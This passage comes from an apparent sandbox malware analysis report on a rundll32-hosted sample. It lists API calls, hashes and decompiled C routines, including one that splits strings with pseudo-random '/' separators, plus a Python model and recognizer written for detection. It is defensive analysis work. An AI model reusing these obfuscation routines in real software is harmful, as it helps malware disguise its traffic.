                                            • Opcode Fuzzy Hash: dc9f38e2ffac39c507879ac6d1665b1c849f9c13c9d3e943d5c57c3631333d87
                                            • Instruction Fuzzy Hash: 70218031110204AFDB259F5ADC59AAA7FBAFF41350F104424FC56C7560D771EC91CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0580F43E
                                            • memcpy.NTDLL(00000018,?,?), ref: 0580F467
                                            • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000C3EA,00000000,000000FF,00000008), ref: 0580F4A6
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580F4B9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                            • String ID:
                                            • API String ID: 2780211928-0
                                            • Opcode ID: b248c87192227c57983ba6c6625c9d1331f569b99e213549d4e38e1bed247f35
                                            • Instruction ID: f3666b617fa9e7cdbc662585dc0ac968c7e102a0d40fbd1a1d6c709102ab16db
                                            • Opcode Fuzzy Hash: b248c87192227c57983ba6c6625c9d1331f569b99e213549d4e38e1bed247f35
                                            • Instruction Fuzzy Hash: CB315C71200605AFEB609F29DC45EAA7FA9FF04320F00C519FE5AD62A0DB74EC549BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581F4A1: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,0580D3E9), ref: 0581F4D7
                                              • Part of subcall function 0581F4A1: memset.NTDLL ref: 0581F54D
                                              • Part of subcall function 0581F4A1: memset.NTDLL ref: 0581F561
                                            • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0580797C
                                            • lstrcmpi.KERNEL32(00000000,?), ref: 058079A3
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 058079E8
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 058079F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                            • String ID:
                                            • API String ID: 1065503980-0
                                            • Opcode ID: d5e0789f50a43bd17f1c59d171f35419dd6effb8821234258c3f85bd83937c7d
                                            • Instruction ID: 91ee763fe6f347ce3a317e3e748024f2346a855adfa301e247c82d93dce51944
                                            • Opcode Fuzzy Hash: d5e0789f50a43bd17f1c59d171f35419dd6effb8821234258c3f85bd83937c7d
                                            • Instruction Fuzzy Hash: 96215C71A00209FFDF21AFA5DC89AAE7FA9FB04354F108461FE05E6160DA34AD94CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 05821A05
                                            • lstrlen.KERNEL32(00000000), ref: 05821A16
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • strcpy.NTDLL ref: 05821A2D
                                            • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 05821A37
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeaplstrlenmemsetstrcpy
                                            • String ID:
                                            • API String ID: 528014985-0
                                            • Opcode ID: 7fe334ce8d0ebe55a2c7fe081944100812c313a4395cadb1dfd843dafa02b26a
                                            • Instruction ID: 7c64ae1ef3c5bf92e68087534beb8b2c3c5e751ace49cd49eeb78d308aad6e2a
                                            • Opcode Fuzzy Hash: 7fe334ce8d0ebe55a2c7fe081944100812c313a4395cadb1dfd843dafa02b26a
                                            • Instruction Fuzzy Hash: 7521AF76614305AFEB209B68D84EB6A7FA8FB44311F14C419FD5BC7280EB75E884CB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			// Fetches a wide string from a COM-style object through two vtable calls, copies it into a
                                            			// heap buffer and returns the buffer and its byte size through _a4 and _a8.
                                            			E049F51D7(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                            				intOrPtr _v8;      // HRESULT of the last call
                                            				void* _v12;        // interface pointer returned through the +0x24 slot
                                            				void* _v16;        // BSTR returned through the +0x100 slot
                                            				intOrPtr _t26;
                                            				intOrPtr* _t28;
                                            				intOrPtr _t31;
                                            				intOrPtr* _t32;
                                            				void* _t39;
                                            				int _t46;
                                            				intOrPtr* _t47;
                                            				int _t48;
                                            
                                            				_t47 = __eax;      // interface pointer; methods are invoked through its vtable
                                            				_push( &_v12);
                                            				_push(__eax);
                                            				_t39 = 0;          // heap copy, NULL until allocated
                                            				_t46 = 0;          // character count
                                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();   // vtable slot +0x24, called as (this, &_v12)
                                            				_v8 = _t26;
                                            				if(_t26 < 0) {     // FAILED(hr)
                                            					L13:
                                            					return _v8;
                                            				}
                                            				if(_v12 == 0) {    // nothing returned yet: wait 200 ms and retry once
                                            					Sleep(0xc8);
                                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                            				}
                                            				if(_v8 >= _t39) {  // SUCCEEDED(hr); _t39 is still 0 here
                                            					_t28 = _v12;
                                            					if(_t28 != 0) {
                                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);   // vtable slot +0x100, returns a BSTR in _v16
                                            						_v8 = _t31;
                                            						if(_t31 >= 0) {
                                            							_t46 = lstrlenW(_v16);
                                            							if(_t46 != 0) {
                                            								_t46 = _t46 + 1;            // include the terminator
                                            								_t48 = _t46 + _t46;         // byte size of the wide string
                                            								_t39 = E049F4DF6(_t48);     // heap allocation helper (elsewhere in the report)
                                            								if(_t39 == 0) {
                                            									_v8 = 0x8007000e;       // E_OUTOFMEMORY
                                            								} else {
                                            									memcpy(_t39, _v16, _t48);
                                            								}
                                            								__imp__#6(_v16);            // OLEAUT32 ordinal 6 = SysFreeString (the "FreeString" in the API ID below)
                                            							}
                                            						}
                                            						_t32 = _v12;
                                            						 *((intOrPtr*)( *_t32 + 8))(_t32);   // vtable slot +8 = IUnknown::Release
                                            					}
                                            					 *_a4 = _t39;              // out: heap copy of the string, or NULL
                                            					 *_a8 = _t46 + _t46;       // out: size in bytes, terminator included
                                            				}
                                            				goto L13;
                                            			}
                                            Address column for the C-code above (41 entries, one instruction address per statement): lowest 0x049f51e3, highest 0x049f5293, last entry 0x00000000.

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeSleepStringlstrlenmemcpy
                                            • String ID:
                                            • API String ID: 1198164300-0
                                            • Opcode ID: f2b9408dc254b849527099e5e67d08bdcde2bada9a96de5f952a7bb820d48e08
                                            • Instruction ID: 3dfada8184be1677a79b097ba0314dd6882e1328a62db0d5d61923e3d6889323
                                            • Opcode Fuzzy Hash: f2b9408dc254b849527099e5e67d08bdcde2bada9a96de5f952a7bb820d48e08
                                            • Instruction Fuzzy Hash: 4F212A75900209FFCB11DFE8D8849DEBBB9FF89355B158279EA01A7211EB30EA01CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 05822423
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0582243E
                                            • GetLastError.KERNEL32 ref: 058224AC
                                            • GetLastError.KERNEL32 ref: 058224BB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalErrorLastSection$EnterLeave
                                            • String ID:
                                            • API String ID: 2124651672-0
                                            • Opcode ID: 6f1050b918b4f60ac15279543f7144db416e3fd954badc4dafb7e4200de55dbd
                                            • Instruction ID: 2a8d784facc8ce339f5c926372a460cea9602d0723bc5e42c7f40f767415b490
                                            • Opcode Fuzzy Hash: 6f1050b918b4f60ac15279543f7144db416e3fd954badc4dafb7e4200de55dbd
                                            • Instruction Fuzzy Hash: 83213C36900619EFCF11DF98D849A9E7FB4FF08720F018155FC06D2250CB34EA959B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 05812A14
                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 05812A58
                                            • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 05812A9B
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05812ABE
                                              • Part of subcall function 0580BD6D: GetTickCount.KERNEL32 ref: 0580BD7D
                                              • Part of subcall function 0580BD6D: CreateFileW.KERNEL32(00000000,80000000,00000003,05829208,00000003,00000000,00000000,?,?,00000000), ref: 0580BD9A
                                              • Part of subcall function 0580BD6D: GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 0580BDCD
                                              • Part of subcall function 0580BD6D: CreateFileMappingA.KERNEL32(00000000,05829208,00000002,00000000,00000000,?), ref: 0580BDE1
                                              • Part of subcall function 0580BD6D: lstrlen.KERNEL32(?,?,?,00000000), ref: 0580BDFD
                                              • Part of subcall function 0580BD6D: lstrcpy.KERNEL32(?,?), ref: 0580BE0D
                                              • Part of subcall function 0580BD6D: HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0580BE28
                                              • Part of subcall function 0580BD6D: CloseHandle.KERNEL32(?,?), ref: 0580BE3A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                            • String ID:
                                            • API String ID: 3239194699-0
                                            • Opcode ID: c09ef3d0ee03735ad1820dfdd7912b4ba855e7b4092fe8f6fa2d9b6240d4ea7e
                                            • Instruction ID: 99466285da22ac570ad365f4c1f715df5b7c992fb4b98158fb17e2ddbe249f36
                                            • Opcode Fuzzy Hash: c09ef3d0ee03735ad1820dfdd7912b4ba855e7b4092fe8f6fa2d9b6240d4ea7e
                                            • Instruction Fuzzy Hash: 65213731600208AADB21EFA6EC48DEE7BB9FF48354F140125FD26E21A0E7309845CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05803AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0581A192), ref: 05803B11
                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00001003,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0581A1CD
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0580A61B,?), ref: 0581A1DF
                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0580A61B,?), ref: 0581A1F7
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,0580A61B,?), ref: 0581A212
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleModuleNamePointerRead
                                            • String ID:
                                            • API String ID: 1352878660-0
                                            • Opcode ID: 4d669c810b3c63a9ba3449b78cf2ba5688ddfbeb4bf36f4a2f269724b3979561
                                            • Instruction ID: 2a7ecb87373637b4d73bf20c35d519a1d6f502a40f64987762388bec3e540b46
                                            • Opcode Fuzzy Hash: 4d669c810b3c63a9ba3449b78cf2ba5688ddfbeb4bf36f4a2f269724b3979561
                                            • Instruction Fuzzy Hash: 04118B71602228BADF21ABA5CC89EEFBE6DEF05650F104111FD15E6090D7319E80CBE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(?), ref: 0580415B
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 0580417D
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 058041A9
                                            • lstrcatW.KERNEL32(00000000,?), ref: 058041BC
                                              • Part of subcall function 05806C62: strstr.NTDLL ref: 05806D3A
                                              • Part of subcall function 05806C62: strstr.NTDLL ref: 05806D8D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3712611166-0
                                            • Opcode ID: ac2d6b4d12b829a9194fe3410bf98cc06c69fcf65aacdfb60279a66c75991d77
                                            • Instruction ID: 29a38de915567cf60622c697c64d4df8e75deac8a8ec170b00e482cabe2d2ea8
                                            • Opcode Fuzzy Hash: ac2d6b4d12b829a9194fe3410bf98cc06c69fcf65aacdfb60279a66c75991d77
                                            • Instruction Fuzzy Hash: 8C112976100119BFDF11AFA6DC88C9E7FADEF19255B009025FE05D6160DB31EE519BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?,?,?,?,05801765), ref: 058150FD
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000,?), ref: 05815114
                                            • StrChrA.SHLWAPI(00000000,0000002E,?,?,05801765), ref: 0581511D
                                            • GetModuleHandleA.KERNEL32(00000000,?,?,05801765), ref: 0581513B
                                              • Part of subcall function 05817DF1: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,05801765,00000000,00000004,?,00000000,?), ref: 05817EC9
                                              • Part of subcall function 05817DF1: VirtualProtect.KERNEL32(?,00000004,?,?,00000000,05801765,00000000,00000004,?,00000000,?,00000000,?,058250A8,0000001C,0581E844), ref: 05817EE4
                                              • Part of subcall function 05817DF1: RtlEnterCriticalSection.NTDLL(05829420), ref: 05817F09
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 105881616-0
                                            • Opcode ID: fd4db34e5ba97eb9a37274900b1c37c1f0d4553f48d4e02f9ca010bf9a05cc1f
                                            • Instruction ID: 840b0327344f5d9ba38b6976008d4587989be5db19155f36424b3b18f373e29f
                                            • Opcode Fuzzy Hash: fd4db34e5ba97eb9a37274900b1c37c1f0d4553f48d4e02f9ca010bf9a05cc1f
                                            • Instruction Fuzzy Hash: 97210E74A00309AFCB22EF68C848AAEBBF9BF85704F148059EC06D7250E774D945CF55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 058057A3
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 058057C7
                                            • RegCloseKey.ADVAPI32(?), ref: 0580581F
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 058057F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: QueryValue$AllocateCloseHeapOpen
                                            • String ID:
                                            • API String ID: 453107315-0
                                            • Opcode ID: 7644c9d749b66109a2b8da4eb0e588197d54c016972efcb4d1bebab128ad1099
                                            • Instruction ID: 38a43a693fa1133766d9766faef7a423699d45c23dbaa4f6a57f34099193b62a
                                            • Opcode Fuzzy Hash: 7644c9d749b66109a2b8da4eb0e588197d54c016972efcb4d1bebab128ad1099
                                            • Instruction Fuzzy Hash: 6821E3B5910208FFDF119F98CC858EEBFBDEB88741B208466EC02E7150D6319E819F60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			// Copies the NUL-terminated string in __eax into a new heap buffer, inserting a '/' after every
                                            			// chunk of 8 to 23 bytes; chunk lengths come from a 32-bit LCG whose state lives at 0x49fa2f0.
                                            			E049F72E7(unsigned int __eax, void* __ecx) {
                                            				void* _v8;         // read cursor into the input
                                            				void* _v12;        // output buffer (return value)
                                            				signed int _t21;
                                            				signed short _t23;
                                            				char* _t27;
                                            				void* _t29;
                                            				void* _t30;
                                            				unsigned int _t33;
                                            				void* _t37;
                                            				unsigned int _t38;
                                            				void* _t41;
                                            				void* _t42;
                                            				int _t45;
                                            				void* _t46;
                                            
                                            				_t42 = __eax;      // input string
                                            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);   // lstrlen (APIs below, ref 049F72F2); result in __eax
                                            				_t38 = __eax;      // bytes remaining
                                            				_t30 = RtlAllocateHeap( *0x49fa2d8, 0, (__eax >> 3) + __eax + 1);   // len + len/8 + 1: one '/' per 8 bytes, plus NUL
                                            				_v12 = _t30;
                                            				if(_t30 != 0) {
                                            					_v8 = _t42;
                                            					do {
                                            						_t33 = 0x18;                   // chunk upper bound 24 ...
                                            						if(_t38 <= _t33) {
                                            							_t33 = _t38;               // ... or the remaining length, whichever is smaller
                                            						}
                                            						_t21 =  *0x49fa2f0; // 0x4310c43e
                                            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;   // LCG with the Numerical Recipes constants 1664525 / 1013904223
                                            						 *0x49fa2f0 = _t23;
                                            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;   // chunk = 8 + (rand16 % (limit - 8)); inputs of 8 bytes or fewer are not handled (limit - 8 is 0 or wraps)
                                            						memcpy(_t30, _v8, _t45);
                                            						_v8 = _v8 + _t45;
                                            						_t27 = _t30 + _t45;
                                            						_t38 = _t38 - _t45;
                                            						_t46 = _t46 + 0xc;             // decompiler artifact: stack cleanup after the cdecl memcpy
                                            						 *_t27 = 0x2f;                 // '/' separator after each chunk
                                            						_t13 = _t27 + 1; // 0x1
                                            						_t30 = _t13;
                                            					} while (_t38 > 8);
                                            					memcpy(_t30, _v8, _t38 + 1);       // tail of at most 8 bytes, plus the NUL
                                            				}
                                            				return _v12;
                                            			}
                                            Address column for the C-code above (28 entries, one instruction address per statement): 0x049f72ef through 0x049f737e.

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,049F37CC,00000000,?,?,049F653D,?,04F795B0), ref: 049F72F2
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 049F730A
                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,049F37CC,00000000,?,?,049F653D,?,04F795B0), ref: 049F734E
                                            • memcpy.NTDLL(00000001,?,00000001), ref: 049F736F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memcpy$AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 1819133394-0
                                            • Opcode ID: e9391b9cacc7d8ec575e406f440c268f4ba63de7328f7deedb4c3b969626d340
                                            • Instruction ID: 2fc1ea34efa0c8c60abbb891acb3132daf8b641ed479d39978b6bcd609fc145c
                                            • Opcode Fuzzy Hash: e9391b9cacc7d8ec575e406f440c268f4ba63de7328f7deedb4c3b969626d340
                                            • Instruction Fuzzy Hash: FF11C672B04215BFD7148FA9DC84D9EBFAEEBD4360B1502B6F904D7250E775AE0487A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%
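                                            The C-code for E049F72E7 above (the same routine appears again in the 05800000 dump under API String ID 1819133394) is small enough to model exactly. The Python below is an added example, not code from the report or from the sample: the chunk bounds, the LCG constants and the '/' separator are read off the decompile; the default seed is the value the dump shows at 0x49fa2f0 at capture time, which is assumed here to be a representative state rather than the original seed; and consistent_with_routine is a hypothetical recognizer added here, useful when deciding whether a '/'-separated string seen elsewhere could have been produced by this routine.

```python
# Added example: Python model of the decompiled routine E049F72E7 (not code from
# the report or from the sample).  Constants are read off the decompile; the
# default seed is the value the memory dump shows at 0x49fa2f0, an assumption
# about the state at capture time, not the original seed.
from typing import Tuple

CHUNK_MAX = 0x18         # _t33 = 0x18: longest chunk candidate
CHUNK_MIN = 8            # the "+ 8" in the chunk formula: shortest chunk
LCG_MULT = 0x19660D      # "_t21 * 0x19660d"
LCG_INC = 0x3C6EF35F     # "0x3c6ef35f + ..."
SEP = 0x2F               # "*_t27 = 0x2f", i.e. '/'
DUMP_STATE = 0x4310C43E  # value at 0x49fa2f0 in the dump (assumed starting state)


def lcg_step(state: int) -> int:
    """One step of the 32-bit LCG the routine keeps at 0x49fa2f0."""
    return (state * LCG_MULT + LCG_INC) & 0xFFFFFFFF


def alloc_size(n: int) -> int:
    """Buffer size the native code requests from RtlAllocateHeap: (n >> 3) + n + 1."""
    return (n >> 3) + n + 1


def split_with_separators(data: bytes, state: int = DUMP_STATE) -> Tuple[bytes, int]:
    """Copy `data`, inserting b'/' after pseudo-random chunks of 8..23 bytes.

    Returns (output, new_state) so successive calls can chain the LCG state the
    way the native code does through its global.  The terminating NUL that the
    native code copies is not represented.
    """
    remaining = len(data)
    if remaining <= CHUNK_MIN:
        # Native code: limit - 8 is 0 (division fault) or wraps; not a valid input.
        raise ValueError("inputs of %d bytes or fewer are not handled by the native routine" % CHUNK_MIN)
    out = bytearray()
    pos = 0
    while True:                                   # do { ... } while (remaining > 8)
        limit = min(remaining, CHUNK_MAX)         # _t33 = min(0x18, _t38)
        state = lcg_step(state)                   # *0x49fa2f0 updated in place
        chunk = (state & 0xFFFF) % (limit - CHUNK_MIN) + CHUNK_MIN   # 8 <= chunk < limit
        out += data[pos:pos + chunk]              # memcpy(_t30, _v8, _t45)
        out.append(SEP)                           # *_t27 = 0x2f
        pos += chunk
        remaining -= chunk
        if remaining <= CHUNK_MIN:
            break
    out += data[pos:]                             # final memcpy of the 1..8 byte tail
    return bytes(out), state


def consistent_with_routine(out: bytes) -> bool:
    """Hypothetical recognizer: could `out` have come from this routine?

    Assumes the original input contained no '/'.  Every chunk before a '/'
    must be 8..23 bytes and the tail after the last '/' 1..8 bytes.
    """
    parts = out.split(b"/")
    if len(parts) < 2:
        return False
    *chunks, tail = parts
    return (all(CHUNK_MIN <= len(c) < CHUNK_MAX for c in chunks)
            and 1 <= len(tail) <= CHUNK_MIN)


if __name__ == "__main__":
    sample = b"constructed-sample-input-without-slashes-0123456789"   # constructed test input
    result, _ = split_with_separators(sample)
    print(result.decode())
    print("consistent:", consistent_with_routine(result))
```

Because the chunk length is taken from the low 16 bits of the LCG state modulo a value of at most 16, the output for a given input is fully determined by the global state at call time; two runs of the sample that start from different states produce differently segmented copies of the same string, which is why a recognizer has to test the segment structure rather than a fixed pattern.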

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0580A27D,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 058157A3
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058157BB
                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0580A27D,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 058157FF
                                            • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 05815820
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 1819133394-0
                                            • Opcode ID: bb30112c90de808992c04ecb3d8e3b2d96f14000bde09c61b31aaed217ccc924
                                            • Instruction ID: 5fb36fa9fbfe16e08f476f5402a8910b8e359dac2109e49c8b7232ae2b20f20f
                                            • Opcode Fuzzy Hash: bb30112c90de808992c04ecb3d8e3b2d96f14000bde09c61b31aaed217ccc924
                                            • Instruction Fuzzy Hash: 16112972A00214BFD7208B6ADC89D9EBFEEEBC1660B054176FD06D7140EA709E009BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GlobalFix.KERNEL32(00000000), ref: 0580F214
                                            • memset.NTDLL ref: 0580F228
                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0580F235
                                              • Part of subcall function 0581D818: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D872
                                              • Part of subcall function 0581D818: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D890
                                              • Part of subcall function 0581D818: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0581D8F8
                                            • GlobalUnWire.KERNEL32(00000000), ref: 0580F260
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                            • String ID:
                                            • API String ID: 3286078456-0
                                            • Opcode ID: f19752ef942a959d1e47bb9dd67e843d67d2777cda21bc3491591e7598da3c10
                                            • Instruction ID: cf0b4f62f10c29337ed27458279d0d885711168ec4e4d07266bc48660e177bf6
                                            • Opcode Fuzzy Hash: f19752ef942a959d1e47bb9dd67e843d67d2777cda21bc3491591e7598da3c10
                                            • Instruction Fuzzy Hash: 16115175914304ABDB21ABA4AC4ABAE7FBCAF58B11F008015FE02E2180EF709905CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,05805F93,00000000,00000000), ref: 05819667
                                            • GetLastError.KERNEL32(?,?,?,05805F93,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,05802605,?,0000001E), ref: 0581966F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 203985260-0
                                            • Opcode ID: 45bad65408039eb5dee22e6c72b02adbfbefe505c634716ddb6cd348f86fc5d8
                                            • Instruction ID: 9590779e64b0b0b67bb4ff01c260c873def7ab3cf9b9e292cab025c1ecd5ae83
                                            • Opcode Fuzzy Hash: 45bad65408039eb5dee22e6c72b02adbfbefe505c634716ddb6cd348f86fc5d8
